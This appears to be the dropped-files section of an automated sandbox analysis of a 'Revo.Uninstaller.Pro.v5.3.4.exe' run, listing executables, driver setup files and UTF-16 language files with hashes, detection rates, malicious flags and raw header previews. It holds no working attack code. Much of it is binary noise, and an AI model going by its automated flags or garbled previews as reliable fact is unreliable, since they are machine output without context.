                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........w.............xL......xL..y...xL......[.......).........t.......w......................................b.........^...[.......^..............[.......Rich............PE..d...'..d..........#.......3..tb.....,H.........@.......................................... ...................................................F.......L...I...H..R...4...@............?.p.....................?.(.....?...............3.@............................text.....3.......3................. ..`.rdata.......3.......3.............@..@.data...@<...`F..N...FF.............@....pdata...R....H..T....G.............@..@.gfids..0.....K.......I.............@..@.giats........L.......K.............@..@.tls..........L.......K.............@....rsrc.....I...L...I...K.............@..@........................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):190640
                                                                                                                                            Entropy (8bit):6.421539474136109
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:OxneIw3rR+YT5J1zOpXJ5IevXr480/wqqpotGcGe9Nbms:OxBm9vOtr7r48Ct7x
                                                                                                                                            MD5:470F2FEABF6AD0A0EEDB02B02AD4C6E8
                                                                                                                                            SHA1:100887FC63BF34CAE420FFEED51900426B300CF7
                                                                                                                                            SHA-256:78288F4C89D635D0E213F3D2B9BD36D1EE4574CCFBA23E86BD900C7457E48318
                                                                                                                                            SHA-512:4FFD8CB2EB8AAE6CE50727937FE759D6CA70D125427FAC512C8DD5B7BF4F60D3EE92B3C5ABE14C1F1C4B4CBEA04F8217D3A4B075A510355A05299191089EA19D
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.&..wH..wH..wH....wH....wH....wH.<)K..wH.<)L..wH.<)M.!wH.....wH..wI.cwH..)A..wH..)...wH..)J..wH.Rich.wH.........PE..d......g..........".................$s.........@..........................................`..................................................w..P...............x........J......\....N..p...........................`O...............................................text............................... ..`.rdata..............................@..@.data................l..............@....pdata..x............x..............@..@.gfids..............................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):25604296
Entropy (8bit):6.723595463931162
Encrypted:false
SSDEEP:196608:D8pA5h1COpxhZwpArAfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIh:gpA5h1nrhIAbFhlqPWpyR1pV
MD5:5E2DAB5ED4703B7FA05508A82FB89D69
SHA1:DA4616D9FD7245BF0410291B90D4C72215159F0B
SHA-256:84EC9BC4133175E6E1DB997E650F53EF14448119F5B1FDFF8ED84F1B4DC5FEDD
SHA-512:FE42EA532F58D55FB7ACC53B2B8322F8B60E30EDE050032399E8D3F2AEE1F2967B46863557547E267D6AA52DCE14FA2694F306697CE9C0660BEF898F985DFFCF
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iy)@.).Iz)}.)..(C.)..(e.)...(V.).I{)..).I|)G.).uO)V.)o..(..)o..(X.)o..(..).Ig)i.)T.)..)..(..).w)U.)T..)U.)..(U.)RichT.)........................PE..d....JMg..........#.........\.......1Q........@.....................................R.... .....................................................0...............|....f...J..............p.......................(....................................................text...j......................... ..`.rdata...s3......t3................@..@.data........p.......L..............@....pdata..|...........................@..@.gfids..,...........................@..@.giats..............................@..@.tls................................@....rsrc...............................@..@........................................................................................................

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):25576112
Entropy (8bit):6.723822651268559
Encrypted:false
SSDEEP:196608:pTOgY7cLQJlZxfRRHfpvuPTxhbmWqPWpyR1pOIIIIIIIIIIIIIIIIIIIIIIIIIIj:pPY7WQJlvf4FhlqPWpyR1pVk
MD5:EE15BFE5A394ADBFB087B053A6A72821
SHA1:FA6FDE156D571986B6DFD94C290DAA80A75E8020
SHA-256:9652F60DE7AE4AA0970578974B1886E17A0CE7B6B68BA0F3E713B34EC3636071
SHA-512:7EFDA209EE106A26B40858040AEF9A1FC389284A1B171C9729EDBF0005E213AD536850AFCFC66083A81D724E52B50833E1E5CE2AA1CC108CAFA7E8CC9B331ED8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iu)@.).Iv)}.)..(C.)..(e.)...(V.).Iw)..).Ip)G.).uC)V.)o..(..)o..(X.)o..(..).Ik)i.)T.)..)..(..).{)U.)T..)U.)..(U.)RichT.)........PE..d....IMg..........#......R...n........P........@.......................................... .....................................................0....P..........t........J..........@9..p...................H:..(....9...............p...............................text...jQ.......R.................. ..`.rdata..,~3..p....3..V..............@..@.data...x.........................@....pdata..t...........................@..@.gfids..,....`.......n..............@..@.giats.......0.......6..............@..@.tls.........@.......8..............@....rsrc........P.......:..............@..@........................................................................................................................

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):179964
Entropy (8bit):6.986303683816821
Encrypted:false
SSDEEP:3072:H5+pMHMfwXZawAuYNvCLBowkvWei9tL5KYps9/1Kj/9aG2l50:H5+p9wXMBgmvhctWrG
MD5:18011FE26C01E02E939389868CB6B771
SHA1:8FF97E84AD54A9279B908D5C66DA34736AD85541
SHA-256:B370F4BFD94F61776FC84CF617EDB644C9ADDF4B02B0DAF14926A95D68FA7C11
SHA-512:9051C26D30EE2B34359FF6508835508032D1434BD8596FD69ADBB73738829BCB2DA07ED03BFA10F2A07E654E43BD7C62E908372915EECAFAC6B2C585A6241829
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@..........................@............@.........................................................................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):2444
Entropy (8bit):4.986959697467434
Encrypted:false
SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
MD5:5187AC55870310AFF60ED802A729A31A
SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
Malicious:false
Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):40240
Entropy (8bit):6.679041686686874
Encrypted:false
SSDEEP:768:5UKM0N2alRO3gpeBJNUG+ML1naP6IXW0hzbhL7bCEMmo2ocAhu:DX+RtTL1naP6IzbhjCEDo2/Ahu
MD5:498C3D4D44382A96812A0E0FF28D575B
SHA1:C34586B789CA5FE4336AB23AD6FF6EEB991C9612
SHA-256:23CB784547268CF775636B07CAC4C00B962FD10A7F9144D5D5886A9166919BBA
SHA-512:CE450128E9CA1675EAB8AA734DC907DFC55F3DACD62503339080D6BD47B2523D063786DBE28E6833DB041F1D5869670BE2411A39C7B8D93D05A98B4C09CAD1A1
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 2%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..x...x...x...x...H..._u..}..._u..z...q.~.z...q.h.y..._u..{...q.t.{...q.i.y...q.l.y...Richx...........................PE..d...5.;K.........."......N..........................................................u...........................................................<............p.......b..0;...... ....Q...............................................P...............................text...;6.......8.................. ..h.rdata.......P.......<..............@..H.data...X....`.......B..............@....pdata.......p.......D..............@..HPAGE.................F.............. ..`INIT....v............N.............. ....rsrc................\..............@..B.reloc..z............`..............@..B........................................................................................................................................................................

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Windows setup INFormation
Category:dropped
Size (bytes):2444
Entropy (8bit):4.986959697467434
Encrypted:false
SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
MD5:5187AC55870310AFF60ED802A729A31A
SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
Malicious:false
Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):38400
Entropy (8bit):6.303083119559888
Encrypted:false
SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (606), with CRLF line terminators
Category:dropped
Size (bytes):111866
Entropy (8bit):3.472213776386747
Encrypted:false
SSDEEP:768:loS7XtdYZqA5IIsJ4FC3P7EHjz7yhYe3w67kiG2ShuJVf6:Fbtnd2m0s6
MD5:A911C2F3BDA6270E6D66F26F41094C9F
SHA1:EAEA65B48486E81C369AE6C5185C66A5E901511C
SHA-256:81B0F02756D39A5772C70AD0F0A85D4091A9C53F72DC8F69FF1738B3CC05F964
SHA-512:67455DA740703FA81CA7D042C4ECB57B19DAC985C0D39E82A4539AF5E536A20A57E6B47A1651385FFE1C36DC5D0A53D11538661E7BEBB13D719D35F52F858B29
Malicious:false
Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.e.s.t.i./.E.s.t.o.n.i.a.n.....W.e.b.L.a.n.g.=.E.S.T.....T.r.a.n.s.l.a.t.o.r.=.t.u.d.i.l.u.d.i. .-. .t.u.d.i.l.u.d.i...e.s.t.o.n.i.a.@.m.a.i.l...e.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...3...8.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.a.a.d.e.....1.0.3. .=. .S.u.v.a.n.d.i.d.....1.0.4. .=. .E.e.m.a.l.d.a.j.a.....1.0.5. .=. .T.....r.i.i.s.t.a.d.....1.0.6. .=. .J...l.i.t.a.j.a. .r.e.~.i.i.m.....1.0.7. .=. .N.i.m.e.k.i.r.i.....1.0.8. .=. .I.k.o.o.n.i.d.....1.0.9. .=. .D.e.t.a.i.l.i.d.....1.1.0. .=. .E.e.m.a.l.d.a.....1.1.1. .=. .K.u.s.t.u.t.a. .s.i.s.s.e.k.a.n.n.e.....1.1.2. .=. .V...r.s.k.e.n.d.a.....1.1.3. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.t. .s.o.o.v.i.d. .v.a.l.i.t.u.d. .s.i.s.s.e.k.a.n.d.e. .k.u.s.t.u.t.a.d.a.?.....1.1.4. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.

Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
Category:dropped
Size (bytes):107284
Entropy (8bit):3.4850832386228205
Encrypted:false
SSDEEP:3072:LqsTLW4zJl0dBdBN86bz6M+fnZPjJPvY/:WIq
MD5:6D908FC7ABF104D6F8D6DE6741DBD279
SHA1:3771939E5D0F6DE53F1E07691DCB2A4AC70041F2
SHA-256:3A99D61A738A7CF3D80581B731FF9070F31CBFB046EC9DE7CBC5C06B76EFA89D
SHA-512:1A75B6FDB923281FF66EC33E3872F27BF3E928006D18D6C987951AE4AC02CC06DBF15CDBEF15B94152698FCB1E0DF1D85A7BE7DF73D72C9E83B23D049E182ECF
Malicious:false
Preview:..;.D.o.k.u.m.e.n.t.i. .i. .g.j.u.h.e.s. .i. .R.e.v.o. .U.n.i.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....;.T.r.a.n.s.l.a.t.e.d. .b.y. .K.l.a.u.s. .V.e.l.i.u.....;.C.o.n.t.a.c.t. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.h.q.i.p./.A.l.b.a.n.i.a.n.....W.e.b.L.a.n.g.=.A.L.....T.r.a.n.s.l.a.t.o.r.=.K.l.a.u.s. .V.e.l.i.u. .e.-.m.a.i.l.:. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.............[...i.n.s.t.a.l.u.e.s.i. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.a.m.j.a.....1.0.3. .=. .O.p.s.i.o.n.e.t.....1.0.4. .=. ...i.n.s.t.a.l.u.e.s.i.....1.0.5. .=. .M.j.e.t.e.t.....1.0.6. .=. .M.e.n.y.r.a. .e. .g.j.u.e.t.a.r.i.t.....1.0.7. .=. .M.e. .l.i.s.t.i.m.....1.0.8. .=. .M.e. .i.n.k.o.n.a.....1.0.9. .=. .M.e. .d.e.t.a.j.e.....1.1.0. .=. ...i.n.s.t.a.l.o.....1.1.1. .=. .H.i.q. .s.h.e.n.i.m.i.n.....1.1.2. .=. .R.i.f.r.e.s.k.o.....1.1.3. .=. .J.e.n.i.

                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (608), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116810
                                                                                                                                            Entropy (8bit):3.9166739452051953
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo/tNe5HzHBOyv7EyqyYjNE7TA4s32rELViqKcc+QTMsUbpUpTk+e7WiBYMUZAj3:tqAEFycUTALVeLKSu+Y9v0OQQERYJ
                                                                                                                                            MD5:74FBABDEFEF9CEA6BE1B41CAF6941C15
                                                                                                                                            SHA1:FE53FEA79D8B382B6B4915E42FC6C0C7B0D6EBAC
                                                                                                                                            SHA-256:A42CBA216AABAAF3272FA6715D16543CDB9F9C008C3F82520DE74F2BB5BCD3A4
                                                                                                                                            SHA-512:2760A317C6BE76291D94687E3E53AD28FF748338A49DBD381BD386FF798AFFFD09301DF5D81087D744F8773C736E4B19F4397794B555CB096B585B2DF9155062
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .9.1.(.J./.A.r.a.b.i.c.....W.e.b.L.a.n.g.=.A.R.J.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...1...7.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (315), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52512
                                                                                                                                            Entropy (8bit):4.15365900856631
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:FoBtEKBHU2OaI3Ky4XDv8VCdzNqyqZSD57LT+:zKBH2a2Ky4T8UzNqyqZA57LT+
                                                                                                                                            MD5:7B8792AD9FED507599886F0D35F18D88
                                                                                                                                            SHA1:81B30BFC236BE7A9CC117DE9A51E2AE9D3CD0264
                                                                                                                                            SHA-256:D594C865D9406920BEBF955D60D28B687A261B52299ED39DFE9E68386BFE1C7F
                                                                                                                                            SHA-512:18FE03947DDC9669054DA659AD4AE6A4D6B2C71283376C0E63084C309CA17431899F3355E342DA28B079C771061BC29CD42AE8369B3270F2215469A880EF4DAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.@.a.u.e...e.v./.A.r.m.e.n.i.a.n.....W.e.b.L.a.n.g.=.a.r.m.....T.r.a.n.s.l.a.t.o.r.=.H.r.a.n.t. .O.h.a.n.y.a.n. ....... .h.r.a.n.t.o.h.a.n.y.a.n.@.m.a.i.l...a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...9.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .O.e.}...h.....1.0.3. .=. .?.a...c.a.~.x...x...t.v.e.......1.0.4. .=. .K.v.{.k.y.....1.0.5. .=. .3.x...n.k...v.e.......1.0.6. .=. .H.P.M.....1.0.7. .=. .Q.a.v.o.h.....1.0.8. .=. .J.a...o.e...v.e.......1.0.9. .=. .D.a.v...a.t.a.}.v.....1.1.0. .=. .K.v.{.e.l.....1.1.1. .=. .K.v.{.e.l. ...a.u.l.h.....1.1.2. .=. .9.a...t.a...v.e.l.....1.1.3. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c...e...h.:.....1.1.4. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c.k...h.:.....1.1.5. .=. .;.v...v.a.i.a...t.a...x...t.....1.1.6. .=. .U.c.v.x...i.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (689), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137338
                                                                                                                                            Entropy (8bit):3.822072970240457
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:6DZ2mE0Dzcyamtkk64nvy9w+gIybiSqamOsfYFyF7F5gZOgNyspNiF:6DZ2mE0FamtmmvyNSqam1YMFU7NyspoF
                                                                                                                                            MD5:053CBEB9CABDE4426AEED59F89415AA7
                                                                                                                                            SHA1:EAE9139D7A15A35D08DB7BBD138130C661D1B651
                                                                                                                                            SHA-256:82803769AC1663397AC87CE234B0F8C4640CDF8CACEC8FBDC4C02A0ECA1305E7
                                                                                                                                            SHA-512:221579B06BE0FAF79AA9EC63E1A217E8052A87306B0FB4B9377276AFA8DD70C6585C284F2485D947B06063DB7832A89BAF174DA1C361CFAD93EFCB2100A417C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. .A.z.Y.r.b.a.y.c.a.n.c.a./.A.z.e.r.b.a.i.j.a.n.i.....W.e.b.L.a.n.g. .=. .A.Z.....T.r.a.n.s.l.a.t.o.r. .=. .M.a.h.i.r. .H.u.s.e.y.n.o.v. .(.u.r.o.b.o.r.o.s.1.3.0.8.7.5.@.g.m.a.i.l...c.o.m.). .....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E. .....V.e.r.s.i.o.n. .=. .V.e.r.s.i.o.n.=.5...3...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n.t.......1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .P.r.o.q.r.a.m. .s.i.l.i.c.i.....1.0.5. .=. .A.l.Y.t.l.Y.r.....1.0.6. .=. .O.v...u. .r.e.j.i.m.i.....1.0.7. .=. .S.i.y.a.h.1.....1.0.8. .=. .0.k.o.n.l.a.r.....1.0.9. .=. .T.Y.f.Y.r.r...a.t.1. .i.l.Y.....1.1.0. .=. .S.i.l.....1.1.1. .=. .G.i.r.i._.i. .S.i.l.....1.1.2. .=. .Y.e.n.i.l.Y.....1.1.3. .=. .S.i.z. . .s.e...i.l.m.i._. .e.l.e.m.e.n.t.i. .s.i.l.m.Y.k. .i.s.t.Y.d.i.y.i.n.i.z.Y. .Y.m.i.n.s.i.n.i.z.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (739), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):134822
                                                                                                                                            Entropy (8bit):4.091712417960198
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:l0g0yS3dFm1917yvw3q7jcVbWcCCPH0iBTkH8NgP2Hb48m++UUaQ:t0yS3dFm6DcCNf
                                                                                                                                            MD5:8BA1BEBEA44A0ED3D19B41847BDF014F
                                                                                                                                            SHA1:BD02C23FA0D0BD122AC8E461FAAE8A2A17C223AC
                                                                                                                                            SHA-256:15E63CF0171687BA26DAFE79D9FDFEF857D737E6C1FA0E5938F35E22C3E2BC4E
                                                                                                                                            SHA-512:FEF7EBEFCBDC385C40CE3A05971A4C2E1F685C0E6D78A6282D731AC1CCC2068618A9E2E16CC5D0CAE15ED5A6AEECABB0C8B11804699BE16092BF7B4B9E52353C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=........... ./.B.e.n.g.a.l.i.....W.e.b.L.a.n.g.=.B.N.....T.r.a.n.s.l.a.t.o.r.=.G.o.u.t.a.m. .R.o.y.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .........................1.0.4. .=. .........................1.0.5. .=. .............1.0.6. .=. ............. ...........1.0.7. .=. .................1.0.8. .=. .....................1.0.9. .=. .......................1.1.0. .=. .....................1.1.1. .=. ............... ....... .............1.1.2. .=. .............1.1.3. .=. ......... ..... ............... ..... ......... ................... ............... ........... .......?.....1.1.4. .=. ......... ..... ............... ..... ......... ................... ................... ................. ...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138458
                                                                                                                                            Entropy (8bit):3.886109011448417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:qyA2Mkq69Ub7gEzBB3dm0bnx06m+O0wufPduvP4BoNpRwmwQKTlZJLTXYjABYV:ZMkczBBtm0bnx06m+O0wufVuvP4BoN3F
                                                                                                                                            MD5:3B7AF4F26FDED0678B85A50A616C7747
                                                                                                                                            SHA1:32EE9D746B29C05B9C8C11617C0051A59B0DA0FD
                                                                                                                                            SHA-256:8C2E75D77767DF1526DEE187771C97497E46BB06AA69B80A004D4746B0401B8B
                                                                                                                                            SHA-512:163ADDD03C30C53C12873B84D86B9A4D28AB39B57FC822B5F3477F6659236881DC7588BAC3D745B0E93A1248156691DA20785AF32E0EDECCD1C951A1CC5DACA1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. ...J.;.3.0.@.A.:.8./.B.u.l.g.a.r.i.a.n. .....W.e.b.L.a.n.g.=.B.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...0.A.B.@.>.9.:.8.....1.0.4. .=. ...5.8.=.A.B.0.;.0.B.>.@.....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.8.....1.0.6. .=. ...8.H.5.=.0.....1.0.7. .=. .!.?.8.A.J.:.....1.0.8. .=. ...:.>.=.8.....1.0.9. .=. ...5.B.0.9.;.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.9.....1.1.1. .=. ...@.5.<.0.E.=.8.....1.1.2. .=. ...?.@.5.A.=.8.....1.1.3. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .8.7.B.@.8.5.B.5. .8.7.1.@.0.=.8.O. .5.;.5.<.5.=.B.?.....1.1.4. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .4.5.8.=.A.B.0.;.8.@.0.B.5. .8.7.1.@.
